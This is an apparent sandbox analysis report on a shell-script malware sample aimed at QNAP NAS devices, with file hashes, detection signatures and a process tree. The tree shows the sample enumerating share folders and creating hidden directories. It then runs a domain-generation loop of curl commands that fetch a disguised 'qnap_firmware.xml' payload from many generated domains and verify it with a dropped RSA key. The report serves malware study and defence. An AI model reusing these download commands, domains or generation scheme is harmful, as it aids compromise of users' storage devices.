ba18ff142bae31457031ca49e772b10792ad3a5bdead90cb2c1d37e2a6c2fd59

Analysis

max time kernel
149s
max time network
158s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
17-02-2025 17:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86da
Size

18KB
MD5

8cee2a187198648c199c1d135c918a3a
SHA1

a9f39f3b832344a79d32d92ac56c50cdaff0b93c
SHA256

09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
SHA512

bb4a8c108c08b4da2ee36f8876c53c2ad28f793cc5ed9999eb81fcead95123adc13d6c718dc3c10e0be75c2b0760251d756a95c61341ff99a84be576d5d00374
SSDEEP

384:S0DO7oJgfOzs0KoWI3xMrKPDWsqLb0Tx75nrzoAU1j:L6TOzs0KfoxBBVcJ

Score

3^/10

discovery

Malware Config

Signatures

Reads runtime system information 17 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	mount
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/mountinfo	mount
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/filesystems	sed

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/.tmp.d1rJ3m	curl
File opened for modification	/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/.tmp.d1rJ3m	curl
File opened for modification	/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/.rsakey	09ab3031796bea1b8b79fcfd2b86da
File opened for modification	/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/.tmp.d1rJ3m	mktemp

/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86da
/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86da
1⤵
- Writes file to tmp directory
PID:1499
- /bin/readlink
  readlink /share/Public
  2⤵
  PID:1500
- /bin/readlink
  readlink /share/Download
  2⤵
  PID:1501
- /bin/readlink
  readlink /share/Multimedia
  2⤵
  PID:1502
- /bin/readlink
  readlink /share/Web
  2⤵
  PID:1503
- /bin/readlink
  readlink /share/Recordings
  2⤵
  PID:1504
- /bin/readlink
  readlink /share/homes
  2⤵
  PID:1505
- /bin/mount
  mount
  2⤵
  - Reads runtime system information
  PID:1510
- /usr/bin/head
  head -n 1
  2⤵
  PID:1512
- /bin/sed
  sed -n "s/.*\\(\\/share\\/[^ /]\\+\\) .*/\\1/gp"
  2⤵
  - Reads runtime system information
  PID:1511
- /bin/grep
  grep -F
  2⤵
  PID:1513
- /bin/mkdir
  mkdir /mnt/HDA_ROOT/.qpkg
  2⤵
  - Reads runtime system information
  PID:1514
- /bin/mkdir
  mkdir /mnt/HDA_ROOT/.qpkg/.config
  2⤵
  - Reads runtime system information
  PID:1515
- /bin/mktemp
  mktemp ./.tmp.XXXXXX
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1522
- /bin/date
  date "+%s"
  2⤵
  PID:1519
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1521
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1520
- /bin/rm
  rm -f ./.tmp.d1rJ3m
  2⤵
  PID:1523
- /bin/date
  date "+%s"
  2⤵
  PID:1524
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://pw8gjw.cf/qnap_firmware.xml?t=1739811948"
  2⤵
  PID:1525
- /bin/date
  date "+%s"
  2⤵
  PID:1527
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://pw8gjw2.cf/qnap_firmware.xml?t=1739811948"
  2⤵
  PID:1528
- /bin/date
  date "+%s"
  2⤵
  PID:1533
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://pw8gjw2f.cf/qnap_firmware.xml?t=1739811948"
  2⤵
  PID:1534
- /bin/date
  date "+%s"
  2⤵
  PID:1536
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://pw8gjw2fy.cf/qnap_firmware.xml?t=1739811950"
  2⤵
  PID:1537
- /bin/date
  date "+%s"
  2⤵
  PID:1539
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://pw8gjw2fyf.cf/qnap_firmware.xml?t=1739811951"
  2⤵
  PID:1540
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1546
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1545
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1544
- /bin/date
  date "+%s"
  2⤵
  PID:1547
- /bin/date
  date "+%s"
  2⤵
  PID:1548
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://lsdqn4.tk/qnap_firmware.xml?t=1739811951"
  2⤵
  PID:1549
- /bin/date
  date "+%s"
  2⤵
  PID:1551
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://lsdqn4h.tk/qnap_firmware.xml?t=1739811952"
  2⤵
  PID:1552
- /bin/date
  date "+%s"
  2⤵
  PID:1554
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://lsdqn4hd.tk/qnap_firmware.xml?t=1739811952"
  2⤵
  PID:1555
- /bin/date
  date "+%s"
  2⤵
  PID:1557
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://lsdqn4hdj.tk/qnap_firmware.xml?t=1739811955"
  2⤵
  PID:1558
- /bin/date
  date "+%s"
  2⤵
  PID:1560
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://lsdqn4hdjj.tk/qnap_firmware.xml?t=1739811958"
  2⤵
  PID:1561
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1567
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1566
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1565
- /bin/date
  date "+%s"
  2⤵
  PID:1568
- /bin/date
  date "+%s"
  2⤵
  PID:1569
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://mkcwki.ml/qnap_firmware.xml?t=1739811960"
  2⤵
  PID:1570
- /bin/date
  date "+%s"
  2⤵
  PID:1572
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://mkcwkic.ml/qnap_firmware.xml?t=1739811969"
  2⤵
  PID:1573
- /bin/date
  date "+%s"
  2⤵
  PID:1575
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://mkcwkica.ml/qnap_firmware.xml?t=1739811969"
  2⤵
  PID:1576
- /bin/date
  date "+%s"
  2⤵
  PID:1580
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://mkcwkican.ml/qnap_firmware.xml?t=1739811980"
  2⤵
  PID:1581
- /bin/date
  date "+%s"
  2⤵
  PID:1583
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://mkcwkicani.ml/qnap_firmware.xml?t=1739811980"
  2⤵
  PID:1584
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1590
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1589
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1588
- /bin/date
  date "+%s"
  2⤵
  PID:1591
- /bin/date
  date "+%s"
  2⤵
  PID:1592
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://ze0fah.ga/qnap_firmware.xml?t=1739811980"
  2⤵
  PID:1593
- /bin/date
  date "+%s"
  2⤵
  PID:1595
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://ze0fahd.ga/qnap_firmware.xml?t=1739811983"
  2⤵
  PID:1596
- /bin/date
  date "+%s"
  2⤵
  PID:1598
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://ze0fahdz.ga/qnap_firmware.xml?t=1739811983"
  2⤵
  PID:1599
- /bin/date
  date "+%s"
  2⤵
  PID:1601
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://ze0fahdzu.ga/qnap_firmware.xml?t=1739811983"
  2⤵
  PID:1602
- /bin/date
  date "+%s"
  2⤵
  PID:1604
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://ze0fahdzuo.ga/qnap_firmware.xml?t=1739811983"
  2⤵
  PID:1605
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1611
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1610
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1609
- /bin/date
  date "+%s"
  2⤵
  PID:1612
- /bin/date
  date "+%s"
  2⤵
  PID:1613
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://otozvp.gq/qnap_firmware.xml?t=1739811983"
  2⤵
  PID:1614
- /bin/date
  date "+%s"
  2⤵
  PID:1616
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://otozvpm.gq/qnap_firmware.xml?t=1739811985"
  2⤵
  PID:1617
- /bin/date
  date "+%s"
  2⤵
  PID:1619
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://otozvpmr.gq/qnap_firmware.xml?t=1739811985"
  2⤵
  PID:1620
- /bin/date
  date "+%s"
  2⤵
  PID:1622
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://otozvpmrg.gq/qnap_firmware.xml?t=1739811985"
  2⤵
  PID:1623
- /bin/date
  date "+%s"
  2⤵
  PID:1625
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://otozvpmrgw.gq/qnap_firmware.xml?t=1739811985"
  2⤵
  PID:1626
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1632
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1631
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1630
- /bin/date
  date "+%s"
  2⤵
  PID:1633
- /bin/date
  date "+%s"
  2⤵
  PID:1634
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://yk0yee.com/qnap_firmware.xml?t=1739811986"
  2⤵
  - Writes file to tmp directory
  PID:1635
- /bin/rm
  rm -f ./.tmp.d1rJ3m
  2⤵
  PID:1637
- /bin/date
  date "+%s"
  2⤵
  PID:1638
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://yk0yeem.com/qnap_firmware.xml?t=1739811994"
  2⤵
  PID:1639
- /bin/date
  date "+%s"
  2⤵
  PID:1641
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://yk0yeemh.com/qnap_firmware.xml?t=1739811994"
  2⤵
  PID:1642
- /bin/date
  date "+%s"
  2⤵
  PID:1644
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://yk0yeemha.com/qnap_firmware.xml?t=1739811996"
  2⤵
  PID:1645
- /bin/date
  date "+%s"
  2⤵
  PID:1647
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://yk0yeemhab.com/qnap_firmware.xml?t=1739812001"
  2⤵
  PID:1648
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1654
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1653
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1652
- /bin/date
  date "+%s"
  2⤵
  PID:1655
- /bin/date
  date "+%s"
  2⤵
  PID:1656
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://zhnlut.biz/qnap_firmware.xml?t=1739812006"
  2⤵
  PID:1657
- /bin/date
  date "+%s"
  2⤵
  PID:1659
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://zhnluth.biz/qnap_firmware.xml?t=1739812006"
  2⤵
  PID:1660
- /bin/date
  date "+%s"
  2⤵
  PID:1662
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://zhnluth9.biz/qnap_firmware.xml?t=1739812006"
  2⤵
  PID:1663
- /bin/date
  date "+%s"
  2⤵
  PID:1665
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://zhnluth95.biz/qnap_firmware.xml?t=1739812006"
  2⤵
  PID:1666
- /bin/date
  date "+%s"
  2⤵
  PID:1668
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://zhnluth95w.biz/qnap_firmware.xml?t=1739812006"
  2⤵
  PID:1669
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1675
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1674
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1673
- /bin/date
  date "+%s"
  2⤵
  PID:1676
- /bin/date
  date "+%s"
  2⤵
  PID:1677
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://jbrn0c.org/qnap_firmware.xml?t=1739812006"
  2⤵
  PID:1678
- /bin/date
  date "+%s"
  2⤵
  PID:1680
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://jbrn0cn.org/qnap_firmware.xml?t=1739812018"
  2⤵
  PID:1681
- /bin/date
  date "+%s"
  2⤵
  PID:1683
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://jbrn0cnb.org/qnap_firmware.xml?t=1739812030"
  2⤵
  PID:1684
- /bin/date
  date "+%s"
  2⤵
  PID:1686
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://jbrn0cnbt.org/qnap_firmware.xml?t=1739812042"
  2⤵
  PID:1687
- /bin/date
  date "+%s"
  2⤵
  PID:1689
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://jbrn0cnbtl.org/qnap_firmware.xml?t=1739812054"
  2⤵
  PID:1690
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1696
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1695
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1694
- /bin/date
  date "+%s"
  2⤵
  PID:1697
- /bin/date
  date "+%s"
  2⤵
  PID:1698
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://cijotn.de/qnap_firmware.xml?t=1739812066"
  2⤵
  PID:1699
- /bin/date
  date "+%s"
  2⤵
  PID:1701
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://cijotnj.de/qnap_firmware.xml?t=1739812066"
  2⤵
  PID:1702
- /bin/date
  date "+%s"
  2⤵
  PID:1704
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://cijotnjj.de/qnap_firmware.xml?t=1739812066"
  2⤵
  PID:1705
- /bin/date
  date "+%s"
  2⤵
  PID:1707
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://cijotnjjf.de/qnap_firmware.xml?t=1739812068"
  2⤵
  PID:1708
- /bin/date
  date "+%s"
  2⤵
  PID:1710
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://cijotnjjfo.de/qnap_firmware.xml?t=1739812069"
  2⤵
  PID:1711
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1717
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1716
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1715
- /bin/date
  date "+%s"
  2⤵
  PID:1718
- /bin/date
  date "+%s"
  2⤵
  PID:1719
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://hjklw9.rocks/qnap_firmware.xml?t=1739812069"
  2⤵
  - Writes file to tmp directory
  PID:1720
- /usr/bin/wc
  wc -c
  2⤵
  PID:1722
- /usr/bin/openssl
  openssl rsautl -pubin -inkey .rsakey -verify
  2⤵
  PID:1725
- /usr/bin/openssl
  openssl base64 -in ./.tmp.d1rJ3m -d
  2⤵
  PID:1724
- /bin/rm
  rm -f ./.tmp.d1rJ3m
  2⤵
  PID:1726
- /bin/date
  date "+%s"
  2⤵
  PID:1727
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://hjklw9a.rocks/qnap_firmware.xml?t=1739812071"
  2⤵
  PID:1728
- /bin/date
  date "+%s"
  2⤵
  PID:1730
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://hjklw9az.rocks/qnap_firmware.xml?t=1739812073"
  2⤵
  PID:1731
- /bin/date
  date "+%s"
  2⤵
  PID:1733
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://hjklw9aza.rocks/qnap_firmware.xml?t=1739812074"
  2⤵
  PID:1734
- /bin/date
  date "+%s"
  2⤵
  PID:1736
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://hjklw9azaq.rocks/qnap_firmware.xml?t=1739812074"
  2⤵
  PID:1737
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1743
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1742
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1741
- /bin/date
  date "+%s"
  2⤵
  PID:1744
- /bin/date
  date "+%s"
  2⤵
  PID:1745
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://oe2ogo.mx/qnap_firmware.xml?t=1739812076"
  2⤵
  PID:1746
- /bin/date
  date "+%s"
  2⤵
  PID:1748
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://oe2ogop.mx/qnap_firmware.xml?t=1739812076"
  2⤵
  PID:1749
- /bin/date
  date "+%s"
  2⤵
  PID:1751
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://oe2ogopv.mx/qnap_firmware.xml?t=1739812076"
  2⤵
  PID:1752
- /bin/date
  date "+%s"
  2⤵
  PID:1754
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://oe2ogopvr.mx/qnap_firmware.xml?t=1739812076"
  2⤵
  PID:1755
- /bin/date
  date "+%s"
  2⤵
  PID:1757
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://oe2ogopvrf.mx/qnap_firmware.xml?t=1739812077"
  2⤵
  PID:1758
- /bin/sed
  sed "y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g"
  2⤵
  - Reads runtime system information
  PID:1764
- /usr/bin/openssl
  openssl base64
  2⤵
  PID:1763
- /usr/bin/openssl
  openssl dgst -sha1 -binary
  2⤵
  PID:1762
- /bin/date
  date "+%s"
  2⤵
  PID:1765
- /bin/date
  date "+%s"
  2⤵
  PID:1766
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://4xdg01.cn/qnap_firmware.xml?t=1739812080"
  2⤵
  PID:1767
- /bin/date
  date "+%s"
  2⤵
  PID:1769
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://4xdg01j.cn/qnap_firmware.xml?t=1739812083"
  2⤵
  PID:1770
- /bin/date
  date "+%s"
  2⤵
  PID:1772
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://4xdg01jh.cn/qnap_firmware.xml?t=1739812083"
  2⤵
  PID:1773
- /bin/date
  date "+%s"
  2⤵
  PID:1775
- /usr/bin/curl
  curl --connect-timeout 12 -m 30 -k -o ./.tmp.d1rJ3m "https://4xdg01jha.cn/qnap_firmware.xml?t=1739812089"
  2⤵
  PID:1776

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/.rsakey

Filesize
625B

MD5
3536dc15bba5feac11bcc94f92927133

SHA1
f91396be5681a92f43d7be0724b0640999aebe01

SHA256
ce4b1a7c87e73a3308f964c1b4d15237fdf5bf39febfbfca0c6eb6badda9b9e2

SHA512
20029ab8c92349a3a2d6ea9148838db8feac3fb7e041edbd7f2683e9f4c9cc7b46bb69d0a2e742c05e419f3f6f64dd62d480fa409bce3947a6fe7052075fee5d

Download Submit
/tmp/Malware-Feed-master/2020.07.27_CISA-Legacy_Malware_Targeting_QNAP_NAS/.tmp.d1rJ3m

Filesize
19B

MD5
595e88012a6521aae3e12cbebe76eb9e

SHA1
da3968197e7bf67aa45a77515b52ba2710c5fc34

SHA256
b16e15764b8bc06c5c3f9f19bc8b99fa48e7894aa5a6ccdad65da49bbf564793

SHA512
fd13c580d15cc5e8b87d97ead633209930e00e85c113c776088e246b47f140efe99bdf6ab02070677445db65410f7e62ec23c71182f9f78e9d0e1b9f7fda0dc3

Download Submit